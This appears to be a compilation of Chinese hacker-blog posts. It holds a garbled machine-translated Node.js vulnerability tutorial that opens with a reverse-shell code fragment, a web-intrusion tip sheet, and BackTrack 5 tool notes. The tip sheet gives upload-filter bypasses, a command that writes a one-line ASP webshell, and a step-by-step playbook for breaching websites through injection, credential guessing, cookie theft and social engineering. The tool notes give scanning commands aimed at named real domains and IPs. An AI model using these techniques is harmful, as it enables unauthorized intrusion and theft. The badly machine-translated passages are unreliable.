（“断接client.end r \ n”）；

}）；

客户。对（错误，函数（e）{

setTimeout（启（主机、端口），5000）；

}）

}）；

返回/ /；

启（的）；“127.0.0.1”，4444）；

系统命令的执行

而做一个Node.js应用程序代码审查，这是看从模块名称child_process使用的功能非常重要，因为这个模块涵盖了所有的功能，从产卵的新流程执行系统命令。

可以看到，我们已经创造了一个演示程序的平。然而，没有验证的IP参数设置。

上面的代码可以利用系统命令执行简单如下：

正则表达式的DoS（拒绝服务）

正则表达式的DOS主要围绕术语叫灾难性的回溯这意味着在如何定义正则表达式引擎搜索模式在用户的输入。让我们看看下面的例子：

我们在这里寻找X的结束与Y的模式，但是如果我们的输入并没有结束与Y和它有更多的X的存在与这一问题，每个X将开始回溯，最终在一个循环中执行更多的迭代次数来确保没有Y的在我们输入。在下面的截图中，我们可以看到，正确的输入，执行时间小于一秒。

我们只提供X的数目。可以看出，执行时间增加一秒，记得Node.js是一个单线程运行，它将为所有在同一时间使用同一应用程序的其他客户造成拒绝服务。

HTTP参数污染

Node.js有个奇怪的功能，允许多个值的一个参数。所以，如果添加具有相同名称的一个参数是参数名称和电子邮件，电子邮件参数的值将包含一个以逗号分隔的两种不同的价值观。

我们可以看到，我们只是打印电子邮件参数的值在这里。

如图所示，当我们提供价值的两个或两个以上的参数具有相同的名称，Node.js将他们用逗号。此功能可用于开发参数污染漏洞。一个例子可以电子邮件Web客户端应用程序，在应用程序期望的电子邮件的参数值，你可以提供一个或多个值。

无保护的途径

大多数的现代应用程序是使用MVC架构，让我们先了解这个词意味着什么。MVC把应用分为三个逻辑组件模型，视图控制器。这大大有助于开发人员和软件架构师的业务逻辑从应用程序代码中分离。简单来说，当一个请求发送到基于MVC模式的Web应用的端点或URL请求发送到负载的用户界面称为视图负责加载视图或执行用户的输入，称为控制器的任何验证任务的终点。从数据端的控制器获取数据作为模型。

所有的网址/控制器端点称为嵌入式路径文件的路线，并有一个路由器，坐在它们之间决定当用户点击http：/ / / www.example.com ABC该控制器具有触发

现在的问题是这样的认证/授权和非认证/授权的路线。从名字上，我们可以确定认证/授权的路线都是那些我们可以访问登录后或一定程度的访问后。

演示这一功能，我们必须设置Nodejs应用称为流行的平台nodegoat。这是演示的应用具有多个用户角色退休。只有管理员可以访问其他用户的退休福利。

可以看出，效益路线不检查用户是否是管理员和其他用户可以访问其他用户的退休福利。

可以看出，我们从一个正常的用户登录，并且没有功能命名为“正常用户帐户的好处”。

我们从一个管理员帐户登录，并发现，这个功能可以通过管理员用户只。

为了验证上述行为，我们再切换到正常的用户帐户，并浏览网页的好处力和能够访问和修改其内容。

固定保护的途径

我们进一步增加isadmin中间件路线以确保只有管理员用户访问这个页面。

我们又一次试图访问的好处页面，被重定向到登录页面在isadmin中间件的定义。

结论：

在这篇文章中，我们已经讨论了5出9的漏洞；其余的将被覆盖在论文的第二部分。

2017年3月28日

中国骇客云网WEB下渗透测试经验技巧

上传漏洞拿shell：

1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马，拿到shell.
2.就是在上传时在后缀后面加空格或者加几点，也许也会有惊奇的发现。例：*.asp ,*.asp..。
3.利用双重扩展名上传例如：*.jpg.asa格式(也可以配上第二点一起利用)。
4.gif文件头欺骗
5.同名重复上传也很OK。：

入侵渗透中用到的命令，语法：

set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息
tasklist /svc   查看服务对应的pid
netstat -ano，netstat -abnv
fsutil.exe fsinfo drives 列出全部盘符
dir d:\*conn*.* /s     找数据库连接文件
telnet 218.25.88.234 3389    对外部是否开放了这个端口
echo ^<%execute(request(“cmd”))%^> >>e:\k\X.asp   写一句话到e:\k\目录,密码为cmd.
type d:\wwwroot\web\k6.asp >d:\wwwroot\123\a.asp   传送d:\wwwroot\web\下的k6.asp到d:\wwwroot\123\重命名为a.asp

注册表敏感信息：

HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\    mysql 注册表位置
HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\   华众主机位置
HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\    serv-u 位置
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNamber 3389端口
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters    1433端口
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSFtpsvc\Parameters\Virtual Roots\ 服务器ftp路径

服务器日志文件物理路径：

安全日志文件：%systemroot%\system32\config \SecEvent.EVT
系统日志文件：%systemroot%\system32\config \SysEvent.EVT
应用程序日志文件：%systemroot%\system32\config \AppEvent.EVT
FTP连接日志和HTTPD事务日志：systemroot% \system32\LogFiles\，下面还有子文件夹，分别对应该FTP和Web服务的日志，其对应的后缀名为.Log。
诺顿杀毒日志：C:\Documents and Settings\All Users\Application Data\Symantec

hackerschina大牛写的入侵网站的经验：

下面谈谈个人入侵的经验，不分语言，只谈拿webshell，至于提权，这里不说，我也很少提权，除非确实有必要！~

1.无论什么站，无论什么语言，我要渗透，第一件事就是扫目录，最好一下扫出个上传点，直接上传shell，诸位不要笑，有时候你花很久搞一个站，最后发现有个现成的上传点，而且很容易猜到，不过这种情况发生在asp居多！

2.asp（aspx）+MSSQL先考虑注入，一般的注入都有DBowner权限可以直接写shell；如果写不了，或者web与数据库分离，那就猜数据，从后台下手了，后台可以上传或者改配置文件；

3.asp（aspx）+ACCESS拿shell一般只有3种方法，一是前台上传或者注入进后台上传；二是注入进后台改配置文件；三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句话；

4.php+MYSQL一般是注入进后台上传，偶尔运气好些权限够高可以注入select into outfile；然后包含，分本地与远程，远程包含在高版本php是不支持的，于是想办法本地上传图片文件或者写到log里；然后php程序某某未公开的漏洞，运气好可以直接写shell。

5.jsp+MYSQL利用数据库拿权限方面基本同php，而且jsp的上传基本很少检查文件后缀，于是只要有注入点与后台，拿shell相当的容易。jsp+ORACLE的站我碰到的不多，碰到的也是猜出用户名与密码从后台下手的。

6.无论什么大站，主站一般都很安全（不然早被人玩了），于是一般从二级域名下手，猜出主站的某些用户名与密码或者搞到主站的源代码，或者旁注得到同网段服务器后cain或arp。

7.一般的大站很少有用现成的CMS的，于是如果你有幸找到源码，那你就发了，注入漏洞啊，上传漏洞啊，写文件漏洞啊，都掌握在你手里。多看看那些大站新出来的测试分站点，那些站还在测试中，可以很轻松拿下。

8.上传有个文件名截断，这包括2个方面，一是00截断，二是长文件名截断（曾经利用这个搞下hw）；然后很多写文件的地方，都可以00，屡试不爽。上传别忘了.asp（当然.asa，.cer，.cdx都可以啦）目录的妙用。

9.php站无论windows还是linux，都有magic_quotes_gpc的问题，magic_quotes_gpc为on的时候，在 server变量注入的时候还是可以select into outfile，今年我搞过某未开源cms就是这个情况，一般情况下为on就别考虑写文件了，不过有这个权限别忘了读文件源码，因为load_file的参数是可以编码的。

10.猜路径或者文件在入侵中非常必要，猜不到路径的时候别忘了google（baidu太烂，google很全），于是你可以考虑看站点下的robot.txt或者robots.txt，会有惊喜。

11.工具的使用很重要，入侵之前用WVS扫扫会有助入侵；注入工具虽然很多，但不见得都好使，现在的软硬防火墙、防注入越来越厉害，那时候你就别偷懒，多手工有助你成长。

12.遇到过一流监控么，遇到其他防post的防火墙么，有时候一句话进去了都无法传大马，那时候，你先学学编码，学学变换绕过。

13.想搞一般的小站，记得查看这个小站的版权，找做这个站的公司，然后从这个公司做的其他站下手，得到源码再回头搞，我曾经通过这个方法拿下某知名制药的公司站。

14.旁注的思路永远不过时，遇到dbowner的注入，可以很舒服写shell到你需要的站，省得麻烦的提权了；运气不好，按部就班拿shell提权得到你所需。

15.永远别忘记社会工程学，利用社工把自己当成一个什么也不会的人，从某某站长的qq，身份证，邮箱等等下手，也许有时可能会有意外；另外别忘记admin,admin；test,test；123456,123456这种简单的尝试，当然，你也可以暴力破解。

16.别忽视XSS，别忽视cookie，XSS可以偷cookie，更有若干妙用，自己学会领悟；cookie可以伪造登陆，cookie可以注入，cookie注入可以绕绝大多数的防火墙。

17.平时搞站多多搜集路径啊，源码啊，工具啊，充实自己的“武器”库；最好把自己的入侵步骤记录下来，或者事后反思下，我一般都是记在txt里，另外要做到举一反三。

18.多学习，多看源码，多看公布出来的0day，脚本是入侵的前提，而不是工具，会用工具会装B你还没入门。

2017年3月28日

中国骇客云backtrack5渗透介绍详情

目录
1、信息收集
2、扫描工具
3、漏洞发现
4、社会工程学工具
5、运用层攻击msf
6、局域网攻击
7、密码破解
8、维护访问

第一章：信息收集（Information Gathering）
目录
第一部分 DNS信息收集DNS分析（DNS Analysis）
第二部分路由信息收集（irpas）
第三部分 All-in-one智能信息收集

第一部分 DNS信息收集DNS分析（DNS Analysis）

1、dnsenum
【位置】
/pentest/enumeration/dns/dnsenum
–>information Gathering–>Network Analysis–>DNS Analysis–>dnsenum
【介绍】
1、使用google搜索引擎获取额外的名字与子域名（-dnsserver 8.8.8.8）（google query=“allinurl： -www site：domain”）
2、使用一个TXT文件暴力破解子域名
3、使用Whois查询C类网络范围，并且计算网络范围
4、反向查询
5、支持多重查询
【使用】
dnsenum -f dns.txt -dnsserver 8.8.8.8 cisco.com -o cisco.txt
-f dns.txt       指定暴力破解文件，可以换成dns-big.txt
-dnsserver       指定dns服务器
cisco.com       为目标域
-o cisco.txt 输出到文件cisco.txt
【例子】
dnsenum.pl -f dns-big.txt -dnsserver ns1.cisco.com cisco.com -o cisco.txt

—————————————————————————–
区域传送：Zone Transfers and getting Bind Versions
主备DNS服务器进行数据传送就用到

—————————————————————————–

2、Dnsmap
【位置】
/pentest/enumeration/dns/dnsmap
–>information Gathering–>Network Analysis–>DNS Analysis–>dnsmap
【介绍】
1、非常类似于dnsenum,可以使用内建的“wordlist”来暴力破解子域，也可以使用用户自定义的“wordlist”。
2、Dnsmap支持把结果输出为CSV格式。
3、不需要root权限
【使用】
dnsmap cisco.com -w wordlist.txt -c cisco.csv
-w wordlist.txt       指定暴力破解文件
-c cisco.csv       输出文件(CSV可以excel打开)
cisco.com          为目标域

第二部分路由信息收集（irpas）

1、tcptraceroute
【位置】
/pentest/enumeration/irpas/tcptraceroute
【介绍】
1、传统traceroute技术发送UDP（linux-traceroute）或者ICMP ECHO（windows-tracert）包，但是tcptraceroute发送TCP SYN包到目标。
2、使用tcptraceroute的好处在于，就算在目标之前存在防火墙，它阻止了普通的traceroute的流量，但是适当TCP端口的流量，防火墙是放行的，所以tcptraceroute能够穿越防火墙抵达目标
3、tcptraceroute收到SYN/ACK表示端口是开放的，收到RST表示端口是关闭的。
【使用】
tcptraceroute cisco.com

—————————————————————————–
传统traceroute是发送UDP/33434到下一跳，然后TTL超时，路由器回复ICMP的TTL超时包，而到达目标，目标回复的是ICMP的端口不可达。
tracert是发送的ICMP包。
—————————————————————————–

2、tctrace(必须到特定目录下面去做)
【位置】
/pentest/enumeration/irpas/tctrace
【介绍】
tctrace工具非常类似于tcptraceroute，它不能使用ICMP ECHO而是使用TCP SYN数据包
【使用】
tctrace -i wlan0(eth1) -d www.cisco.com

第三部分 All-in-one智能信息收集

Maltego(有图形化界面)
【位置】
–>Information Gathering–>Network Analysis–>DNS Analysis–>maltego
【介绍】
Maltego是一个开放源的智能信息收集工具
可以收集站点相关的信息有：
1、Domain name          （域名）
2、DNS name             （DNS名）
3、Whois information （Whois信息）
4、Network blocks       （网段）
5、IP addresses          （IP地址）
可以收集个人相关的信息有：
1、Companies and organizations related to the person（公司或组织关联到的人）
2、E-mail address related to the person（电邮地址关联的人）
3、Websites related to the person（网站关联到的人）
4、Social networks related to the person（社区网络关联到的人）
5、Phone numbers related to the person（电话号码关联到的人）

第二章：扫描工具（Scan Tool）
目录
第一部分：主机发现
第二部分：操作系统指纹
第三部分：端口扫描
第四部分：服务探测
第五部分：VPN探测
—————————————————————————–
linux下添加默认网关
route add default gw xx.xx.xx.xx
linux下修改DNS服务器
/etc/resolv.conf—>nameserver xx.xx.xx.xx
—————————————————————————–

第一部分：主机发现（Host found）

1.arping
【介绍】
对直连网络，使用ARP request进行测试，一个特定IP是否正在被使用（在直链网络不可抗拒）
【命令】
arping -c 5 （ping的次数）10.1.1.1（ping的目标）

2.fping
【介绍】
使用ICMP ECHO一次请求多个主机，特点就是速度快
【命令】
Fping -s -r 3 -g 63.223.118.1 63.223.118.100
-s       打印最后结果
-r n    请求的次数
-g       范围（xx.xx.xx.xx xx.xx.xx.xx）（xx.xx.xx.xx/24）

3、Genlist
【介绍】
获取使用清单，通过ping探针的响应，特点简洁速度快
【命令】
genlist -s 10.0.0.\*
-s 10.0.0.\*（扫描目标格式是10.0.0.\* 表示10.0.0.0到255的整个扫描）

4、hping3
【介绍】
支持发送自定义包和显示目标的回应，它支持TCP,UDP,ICMP和RAW-IP协议
这个程序的用法非常高级，可以生成你任意想生成的任何包结构，但是操作非常复杂，建议去官网下载说明
【命令】
hping3
hping3>hping send {ip(daddr=10.1.1.1)+icmp(type=8,code=0)}
hping3>hping recv eth1

5、nbtscan
【介绍】
扫描一个IP地址范围的NetBIOS名字信息（专门找WINDOWS系统信息），它将提供一个关于IP地址，NetBIOS计算机名，服务可用性，登录用户名和MAC地址的报告。
【命令】
nbtscan 10.1.1.1-254

6、nping
【介绍】
nping工具允许用户产生各种网络数据包（TCP,UDP,ICMP,ARP），也允许用户自定义协议头部，例如：源和目的，TCP和UDP的端口号。
【命令】
nping -c 1 –tcp -p 80 –flags syn 10.1.1.1
-c n          次数
–tcp          协议类型
-p 80          端口
–flags syn       标签
10.1.1.1       目标地址

7、Onesixtyone
【介绍】
onesixtyone是一个snmp扫描工具，用于找到设备上的SNMP Community字串。
Onesixtyone的扫描速度非常快。
【命令】
/pentest/enumeration/snmp/onesixtyone#./onesixtyone -c dict.txt 10.1.1.2
-c dict.txt 使用字典文件（该文件建议自己备份再生成）
10.1.1.2 目标

8、protos
【介绍】
主要用来扫描特定主机上所支持的协议。
【命令】
/pentest/enumeration/irpas#./protos -i eth1 -d 10.1.1.2 -v
-v 显示结果的意思

第二部分：操作系统指纹

1、p0f
【介绍】
一个被动的操作系统指纹监控工具，Cisco IPS 就是用这个程序获取目标的操作系统
【命令】
root@bt:~# p0f

2、Xprobe2
【介绍】
主动OS指纹探测工具
【命令】
root@bt:~# xprobe2 www.heituan.net（目标IP或域名）

第三部分：端口扫描

1、Autoscan
【介绍】
图形化网络扫描工具，能够发现网络中的活动主机

2、Netifera
【介绍】
可实现网络探测和抓包功能（局域网抓包）

3、NMAP
【介绍】
NMAP是一综合性的，并且特性丰富的端口扫描工具，是一个渗透测试者的必备工具
NMAP包含如下的能力
1、主机发现
2、服务于版本检测
3、操作系统检测
4、网络追踪
5、NMAP脚本引擎
【命令】
命令1（用于主机发现） root@bt:~# nmap -v -n -sP 192.168.11.0/24
命令2（用于系统查询） root@bt:~# nmap -v -n -A  63.223.118.10
-v       把整个扫描结果显示出来
-n       不做DNS解析
-sP    列出当前网络那些主机在线
-A       综合扫描，使操作系统检测,版本检测、脚本扫描

第四部分服务探测（Service detection）
1.Amap
【介绍】
Amap是一个工具用于探测特定端口上运行的具体运用
【命令】
root@bt:~# amap -bq 63.223.118.10 80（端口）

三、漏洞发现

目录
第一部分：Cisco工具
第二部分：SNMP工具
第三部分：HTTP工具
第四部分：SMB工具
第五部分：综合漏洞发现工具Nessus

第一部分：Cisco工具
1、Cisco Auditing Tool
【功能解释】
一个很小的安全审计工具，它扫描Cissco路由器的一般性漏洞，例如默认密码，SNMP community字串和一些老的IOS bug，速度并不是很快，但是很简单
【命令】
/pentest/cisco/cisco-auditing-tool#./CAT
【参数】
-h hostname 搜索单一主机
-f hostfile 搜索多个主机
-p post # 默认端口23
-w wordlist 命令字典文件
-a passlist 密码字典文件
-i [ioshist] 检查IOS历史BUG
-l logfile 输出日志文件，默认到屏幕
-q quiet mode 没有屏幕输出
【字典】
/pentest/cisco/cisco-auditing-tool/list/
passwords 密码字典文件
community 命令字典文件

2、Cisco Passwd Scanner
【功能】
这个工具用于发现拥有默认telnet密码“Cisco”的Cisco设备，这个工具速度非常快，但是不能加载字典文件，可以对一个段进行快速扫描。
【命令】
/pentest/cisco/ciscos#./ciscos xx.xx.xx 3 -t 4 -C 10
3 表示3个255的掩码
-t 4 一个连接的超时时间，4是秒数
-C 10 最大同时连接数

第二部分：SNMP扫描工具
1、ADMSnmp
【功能】
ADMSnmp用于暴力破解SNMP community字串，使用预先定义的“wordlist”。速度还是比较快的。
【命令】
/pentest/enumeration/snmp/admsnmp#
./ADMsnmap <host> [-g,-wordf,-out <name>,[-waitf, -sleep, -manysend, inter <#>]]
./ADMsnmap xx.xx.xx.xx -wordf snmp.passwd
【参数】
-wordfile 去尝试的密码字典文件
-outputfile <name> 输出到文件
-waitfor <mili> 每个节点等待的时间
-sleep <second> 每个扫描间隔等待的时间
-manysend <number> 发送多少个包回应
-inter <mili> 每个回应后等待多少秒

2、Snmp Enum
【功能】
在获得community后，可以使用snmp enum获取大量关于Cisco，windows和linux的信息，速度比较快
【命令】
/pentest/enumeration/snmp/snmpenum#
./snmpenum.pl xx.xx.xx.xx private cisco.txt（这里有windows.txt和linux.txt针对不同设备有不用功能）

第三部分：HTTP扫描工具
1、Burp Suite
【功能】
Burp Suite是一个功能强大的web运用安全工具，它能够扫描，分析和攻击web运用，通过手动和自动技术。可以劫持探测，可以做一些代理的攻击。这是一个有界面的程序。可以把整站拿下来。功能非常强大。
【命令】
/pentest/web/burpsuite#
java -jar burpsuite_v1.4.jar

2、Grendel Scan
【功能】
一个自动web运用安全评估工具，它扫描，检测，攻击普通的web运用的脆弱性，并且把扫描结果生成一个报告。说白了就是普通网页漏洞扫描工具。也是一个图形化界面工具。
【命令】
/pentest/web/grendel-scan#
./grendel.sh
【模块加载】
Test Module Selection下有很多模块可以加载，加载越多用的时间越多。

3、Nikto2
【功能】
Nikto2是一个高级web服务器安全扫描工具，他扫描并且检测，由于服务器配置失误而造成的安全隐患。
【命令】
/pentest/web/nikto#
./nikto.pl -h xx.xx.xx.xx -C -p 80 -T 3478b -t 3 -D \ V -o webtest -F htm
【参数】
-h hostname
-p xx
-o 输出文件名
-F 输出的格式

4、W3AF
【功能】
W3AF是一个特性丰富的web运用攻击和审计的框架，他协助检测和攻击web的脆弱性。
【命令】
/pentest/web/w3af#
./w3af_console
参数配置
w3af>>>plugins（插件设置）
w3af/plugins>>>help
w3af/plugins>>>output console,htmlFile（插件输出设置）
w3af/plugins>>>output config htmlFile（插件文件格式设置）
w3af/plugins/output/config:htmlFile>>>set verbose True（冗余模式打开）
w3af/plugins/output/config:htmlFile>>>set fileName testreport.html（输出文件名）
w3af/plugins/output/config:htmlFile>>>back
w3af/plugins>>>output config console（插件模块设置）
w3af/plugins/output/config:console>>>set verbose False
w3af/plugins/output/config:console>>>back
w3af/plugins>>>audit htaccessMethods , osCommanding , sqli , xss（加载各种脚本）
w3af/plugins>>>back
w3af>>>target（目标地址设置）
w3af/config:target>>>set target http://xx.xx.xx.xx/
w3af/config:target>>>back
w3af>>>start（开始攻击）

5、WAFW00F
【功能】
WAFW00F是一个用来探测WAF（运用层防火墙）的工具，会返回在这个之前有什么运用级防火墙是哪个厂商的
【命令】
/pentest/web/waffit#
./wafw00f.py http://xx.xx.xx.xx

6、Samrdump
【功能】
Sanrdump用于访问（DCE/RPC）服务，能够列出所有的系统服务，用户账户和其他有用的信息。前提是你必须有个账号，不必是管理员账户。
【命令】
/pentest/pyton/impacket-examples#
./samrdump.py administrator:cisco@xx.xx.xx.xx 445/SMB（445端口号，SMB是服务名）

第五部分：综合漏洞发现工具Nessus
【功能】
非常知名并且功能强大的综合漏洞发现工具，有免费与收费两种版本，本次介绍的主要的免费版本。有windows版本和linux版本。他在每次登陆前都会自动的更新插件，这个插件可以离线下载。界面很简单扫描的结果非常详细，也可以自己写插件。这个软件每次使用都要求你注册一次并且要连接互联网，输入它的验证码。
【开启服务】
/etc/init.d/nessusd start
【登陆界面】
https://localhost:8834
【Policies】
可以自定义各种漏洞扫描插件加载，自己编写插件等。

四、社会工程学工具SET
这种工具是一种无处不在，可以收集各种信息的工具集合，可以说是防不胜防的方法，当然他也是考验攻击者和被攻击者智商和计算机知识了解程度，注意力和不注意的一个工具。

目录（这里我结合SET的全功能做了详细笔记，就没有一项项做实验）
第一部分：Java Applet Attack Method（利用java的病毒攻击）
第二部分：Credential Harvester Attack Method（收集个人信息）

五、应用层攻击MSF
前提是找到有漏洞的主机，然后根据这些漏洞进行攻击，应用层攻击就是利用这些漏洞进行攻击

六、局域网攻击

目录
第一部分:MAC泛洪攻击
第二部分:Yersinia.1.CDP
第三部分:Yersinia.2.DHCP
第四部分:Yersinia.3.DTP
第五部分:Yersinia.4.HSRP
第六部分:Yersinia.5.STP
第七部分:Arpspoof
第八部分:Ettercap之ARP欺骗
第九部分:Ettercap之DNS欺骗

七、密码破解

目录
第一部分:无线密码破解
第二部分:Cisco密码破解

八、维持访问

目录
第一部分：DNS隧道技术
第二部分：Ping隧道技术
第三部分：SSL隧道技术
第四部分：3proxy代理技术
第五部分：Netcat